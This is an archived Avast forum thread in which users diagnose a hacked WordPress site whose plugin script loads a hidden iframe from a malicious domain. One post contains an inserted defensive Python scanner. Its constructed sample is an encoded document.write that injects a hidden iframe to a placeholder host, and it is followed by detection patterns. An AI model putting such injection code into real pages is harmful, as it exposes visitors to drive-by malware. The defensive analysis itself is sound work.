Avast WEBforum

Other => Viruses and worms => Topic started by: mlapage on January 20, 2012, 12:18:08 AM

Title: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: mlapage on January 20, 2012, 12:18:08 AM
I have a website wxw.msolarpro.com. When I go to the site I get an avast! Web Shield blocked trojan horse message. I Googled the trojan and didn't find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?

Thanks,

Mike
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: Pondus on January 20, 2012, 12:28:49 AM
Sucuri - INFECTED   -http://sitecheck.sucuri.net/results/www.msolarpro.com


VirusTotal URL scan
https://www.virustotal.com/url/b417c30323119157b1261a38567c6b62c55941dd22dade7bc984be07d0f1068e/analysis/1327015879/

Wepawet - Suspicious
http://wepawet.iseclab.org/view.php?hash=fc212bf7576cae45a08415e6b278b2e8&t=1327015872&type=js

UrlQuery - suspicious
http://urlquery.net/report.php?id=16826
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: iroc9555 on January 20, 2012, 02:41:41 AM
@ Pondus

When clicking your URL for -www.msolarpro.com results by Sucuri, Avast gives an alert for a  blocked trojan. Check it out.

Sucuri - INFECTED   -http://sitecheck.sucuri.net/results/www.msolarpro.com

Regards.
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: DavidR on January 20, 2012, 02:45:23 AM
I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results. As presumably the example of the actual script, document .  write gives the web shield a fit.

So you will have to break the link.
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: nsm0220 on January 20, 2012, 03:04:16 AM
Quote
I have a website www.msolarpro.com. When I go to the site I get an avast! Web Shield blocked trojan horse message. I Googled the trojan and didn't find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?

Thanks,

Mike

BTW, it does have a Trojan in it. I went to the link and G Data found the Trojan, so the site has a Trojan in it.
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: Pondus on January 20, 2012, 03:18:07 AM
virustotal - 9/41
https://www.virustotal.com/file/a90e49446b4b843b4452860d7f5e421e0c5e9c5c155265c049f96ef9fe44a19d/analysis/1327025796/
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: iroc9555 on January 20, 2012, 03:20:03 AM
@ DavidR

Quote
I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results.

No sheat! It really gave me a scare. First time though. Hope I am safe. What do you think happened?
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: Pondus on January 20, 2012, 03:27:34 AM
avast shield reacted on the code displayed at Sucuri   ;)


It also happens here in the forum if someone posts code that avast detects.


see attached screenshot
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: DavidR on January 20, 2012, 03:41:17 AM
Quote
@ DavidR

I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results.

No sheat! It really gave me a scare. First time though. Hope I am safe. What do you think happened?

I said what I believe happened, sucuri displays the code extracted from the suspect site and the web shield detects it in the same way it would on the original site.

This happens when you are using some analysis sites that give more information on what is found, as it is a copy of what is on the site. I have a number of exclusions for some analysis sites.

It is just that in the past sucuri didn't display the page link to the results so we had to post an image of the information. Now that it does those visiting the results page could well get a shock.

So I think it is back to images.
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: iroc9555 on January 20, 2012, 04:04:08 AM
OK.

Quote
I said what I believe happened, sucuri displays the code extracted from the suspect site and the web shield detects it in the same way it would on the original site.

I got it now. Your UK English messes with my US English, learned as a second language. Thanks.

Back to mlapage. Sorry guy for the momentary hijacking.
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: Pondus on January 20, 2012, 12:56:38 PM
Norman lab
Quote
Files:
-www.msolarpro.com.htm : Clean!
l10n.js : Clean!

These are the clean files, but we do get an 'iframe' of 'brunno.cz.cc'; this is an inactive link now, so marking as clean.
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: DavidR on January 20, 2012, 01:42:30 PM
The Norman attitude is strange to me, as the site in itself has been hacked (wordpress files, don't know if it is an old vulnerable version being exploited), regardless of whether the remote source is up at the time it is checked, as there is nothing to stop the remote site becoming active.
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: polonus on January 21, 2012, 12:35:22 AM
Well, this is flagged as suspicious by avast as JS:ScriptDC-inf[Trj] for the jsunpack analysis
of the mentioned site:
-www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) (script) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
     status: (referer=-www.msolarpro.com/)saved 386 bytes 8312b9b0c984c54fbc8feaf66bcb4b1dd3acaf58
     info: [decodingLevel=0] found JavaScript
Avast webshield flags  -www.msolarpro.com/wp-includes/js/l10n.js?ver=20101110
But to Pondus, also have a look here for a second op: http://forum.avast.com/index.php?action=printpage;topic=83287.0  where a false positive was found... and the IP also had an instance of HTML/Redirector.MA on it (now dead).
Also consider this VT scan: https://www.virustotal.com/url/b417c30323119157b1261a38567c6b62c55941dd22dade7bc984be07d0f1068e/analysis/1327015879/   (detection from Bitdefender, but TrafficLight does not list it)

Now we can finally come to the point why the avast webshield blocks this, re: http://wepawet.iseclab.org/view.php?hash=be10484672ca0c3fdf9004f67f05cc13&t=1327101730&type=js

The iFrame source found there: -http://brunno.cz.cc
has malicious activity, found here, see:
http://google.com/safebrowsing/diagnostic?site=brunno.cz.cc/&hl=ru-RU  
brunno.cz.cc  this site has infected 76 domains as we read there
via -/showthread.php?t=37220338 on it!

We can conclude that the dents of the avast web shield really dig that deep, my good forum friends, as I have explained and demonstrated above in my explanation of the website scan analysis. Yes, I repeat this again: the avast webshield, notwithstanding the status of the exploit found, is an awesome and formidable protection tool.

polonus
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: polonus on January 21, 2012, 01:21:37 AM
@DavidR,

I think the avast point of view is the right one here. As long as the website code stays exploitable and the software is not fully patched, reinfection stays an imminent threat.
As long as the webclient can no longer be infected, we could conclude the block could be lifted.

So norman says malcode no longer up or responding, site safe to be visited by user.
This attitude towards the issue is rounding the bends by a mile, so to say.

Better is to lift website blocking when the website is secure for both user and website owner/website hoster/webmaster: the software code has been fully patched, exploit code cleansed, and all measures have been taken to prevent re-infection. One such action could be as easy as no longer giving away the full server software version, etc.

polonus
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: mlapage on January 21, 2012, 05:27:12 PM
I thank you all for the help you have provided. I read the replies, however I did not understand all of what was discussed. Does '/sitecheck.sucuri.net/results/' clean the infected code or just inform of the infection?
Where does my website stand at this time, as far as the avast program is concerned?

Thanks again,

Mike
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: !Donovan on January 21, 2012, 05:42:48 PM
Sucuri does NOT clean the infected code UNLESS you pay for it.


If you can edit your source code, search for the malcode provided in the
previous image provided by Pondus and delete it.
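!Donovan's advice is to search the source for the injected code by hand. As an added example (not from this thread, and not code from Sucuri, avast or any other tool named here), a small Python scanner that flags the patterns discussed above: a document.write wrapped around a decoder, and hidden or 1x1 iframes pointing at a host other than the site's own. The sample file and the host in it are constructed, and SITE_HOSTS is an assumed allowlist for the site in the thread.

```python
import re
from urllib.parse import unquote, urlparse

# Assumed allowlist: hosts this site legitimately loads frames from.
SITE_HOSTS = {"www.msolarpro.com", "msolarpro.com"}

# Constructed sample, NOT the real include.js from the thread: legitimate plugin
# code followed by an appended, URL-encoded document.write that injects a
# hidden iframe pointing at a placeholder external host.
SAMPLE_JS = (
    "function ddm_init(){ /* legitimate dropdown-menu code */ }\n"
    "var m = document.getElementById('menu');\n"
    "document.write(unescape('%3Ciframe src=%22http://bad-host.invalid/in.php%22 "
    "width=1 height=1 style=%22visibility:hidden%22%3E%3C/iframe%3E'));\n"
)

# document.write whose argument passes through a decoder: typical of injected code
OBFUSCATED_WRITE = re.compile(
    r"document\.write\s*\(.*?(?:unescape|String\.fromCharCode|eval)\s*\(", re.I)
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
HIDDEN = re.compile(
    r"(?:width|height)\s*=\s*[\"']?[01](?!\d)|visibility\s*:\s*hidden|display\s*:\s*none", re.I)
SRC = re.compile(r"src\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def scan_text(text, site_hosts=SITE_HOSTS):
    """Return [(line_no, reason), ...] for injected-iframe patterns in JS/HTML text.
    The remote host is never contacted: an iframe to a dead host is still reported,
    because the injected code is the problem, not whether the host answers today."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = unquote(raw)  # decode %3C-style escapes so encoded markup becomes visible
        if OBFUSCATED_WRITE.search(line):
            findings.append((no, "document.write with decoder (unescape/fromCharCode/eval)"))
        for m in IFRAME.finditer(line):
            attrs = m.group(1)
            if HIDDEN.search(attrs):
                findings.append((no, "hidden or 1x1 iframe"))
            s = SRC.search(attrs)
            host = urlparse(s.group(1)).hostname if s else None
            if host and host not in site_hosts:
                findings.append((no, f"iframe to external host {host}"))
    return findings

def scan_file(path, site_hosts=SITE_HOSTS):
    """Scan one file on disk (e.g. everything under wp-content and wp-includes)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read(), site_hosts)

if __name__ == "__main__":
    for line_no, reason in scan_text(SAMPLE_JS):
        print(f"line {line_no}: {reason}")
```

Run scan_file over every .js and .php file in the WordPress tree and review each hit by hand; a match is a lead to inspect, not proof of infection on its own.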
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: polonus on January 21, 2012, 07:13:04 PM
Hi mlapage,

I do not get an avast alert now. This still could be patched: -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
     status: (referer=-www.google.com/trends/hottrends)saved 16949 bytes 91588590e403cf96232b117e04289bbc21b898be
     info: [script] -www.msolarpro.com/wp-includes/js/jquery/jquery.js?ver=1.7.1
     info: [script] -www.msolarpro.com/wp-content/plugins/brainhost-plugin/script.js?ver=1.0
     info: [script] -www.brainhost.com/ads/ad.js?size=300x250
     info: [script] -www.brainhost.com/ads/ad.js?size=120x600
     info: [script] -www.msolarpro.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20111117
     info: [decodingLevel=0] found JavaScript
     suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
     info
No particulars now here: http://wepawet.iseclab.org/view.php?hash=fc212bf7576cae45a08415e6b278b2e8&t=1327169129&type=js

polonus
Title: Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
Post by: DavidR on January 21, 2012, 07:47:25 PM
In its results it is only showing what it considers infected/suspect; it won't clean it, as that in itself would be hacking if someone could ask it to check the site out and that resulted in changes unknown to the owner.

Any cleaning is down to the site owner; it does however offer service plans to clean up sites, though I have never used any of their services. The one site clean-up premium service plan does seem reasonably good value though: http://sucuri.net/signup

####
I don't get an alert visiting your site using firefox 9.0.1.

So it would appear that something has been updated/cleaned up in regard to the wordpress files, as sucuri no longer flags it as infected, see image.

Looks like you don't have to do anything else.